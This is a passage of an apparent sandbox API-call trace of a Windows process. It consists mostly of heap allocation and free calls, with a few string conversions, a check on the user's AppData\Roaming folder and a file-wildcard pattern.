returned 0xf [0216.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0216.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0216.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0216.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0216.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0216.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0216.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e58910 [0216.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0216.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0216.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0216.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0216.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0216.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b28 [0216.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0216.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0216.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0216.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0216.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b98 [0216.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0216.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0216.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0216.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e539b0 [0216.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0216.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0216.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0216.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0216.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0216.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0216.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0216.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0216.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0216.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0216.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0216.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0216.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0216.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0216.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0216.908] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0216.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0216.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0216.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0216.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0216.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0216.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0216.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0216.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0216.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0216.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0216.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0216.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0216.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0216.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0216.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0216.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0216.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0216.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0216.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0216.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0216.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0216.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0216.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0216.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0216.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0216.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0216.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0216.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0216.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0216.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0216.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0216.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0216.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0216.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0216.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0216.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0216.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0216.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0216.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0216.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0216.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0216.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0216.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0216.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0216.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0216.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0216.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0216.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0216.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0216.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0216.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0216.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0216.910] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0216.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0216.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0216.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0216.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0216.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0216.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0216.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0216.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0216.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0216.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0216.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0216.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0216.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0216.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0216.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0216.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0216.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0216.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0216.911] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/]+\\z", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0216.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9) returned 0x2e50530 [0216.911] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/]+\\z", cchWideChar=9, lpMultiByteStr=0x2e50530, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\\\\/]+\\z", lpUsedDefaultChar=0x0) returned 9 [0216.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0216.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x52) returned 0x2e563a8 [0216.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0216.911] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\FD1HVy/AppData/Roaming", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0216.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0216.911] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\FD1HVy/AppData/Roaming", cchWideChar=32, lpMultiByteStr=0x2e54530, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\FD1HVy/AppData/Roaming", lpUsedDefaultChar=0x0) returned 32 [0216.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0216.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0216.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0216.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0216.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0216.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0216.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0216.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0216.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0216.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0216.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0216.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0216.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0216.912] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2e54198, cbMultiByte=32, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 32 [0216.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0216.912] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2e54198, cbMultiByte=32, lpWideCharStr=0x2e78b28, cchWideChar=32 | out: lpWideCharStr="C:\\Users\\FD1HVy/AppData/Roaming") returned 32 [0216.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0216.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0216.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0216.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0216.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0216.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0216.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0216.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0216.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0216.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0216.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0216.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0216.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0216.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0216.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0216.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0216.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0216.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0216.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0216.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0216.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0216.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0216.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0216.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0216.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0216.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0216.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e563a8 [0216.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0216.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0216.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0216.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0216.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0216.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0216.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0216.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0216.913] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0216.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0216.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0216.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0216.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0216.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0216.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0216.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0216.914] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming\\" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0216.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0216.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0216.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0216.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0216.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0216.914] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0216.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0216.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0216.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0216.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0216.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0216.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0216.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0216.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0216.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0216.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0216.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0216.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0216.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0216.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0216.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0216.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0216.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0216.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x17) returned 0x2e69a68 [0216.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", cchWideChar=23, lpMultiByteStr=0x2e69a68, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", lpUsedDefaultChar=0x0) returned 23 [0216.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0216.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0216.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0216.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x59) returned 0x2e56440 [0216.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505c0 [0216.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="*.*", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0216.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0216.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="*.*", cchWideChar=4, lpMultiByteStr=0x2e54c38, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*.*", lpUsedDefaultChar=0x0) returned 4 [0216.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0216.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0216.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0216.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56440 | out: hHeap=0x970000) returned 1 [0216.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0216.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0216.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0216.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0216.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0216.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0216.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0216.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0216.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0216.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0216.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0216.916] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0216.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0216.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0216.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0216.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0216.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0216.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0216.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0216.916] HeapFree (in: 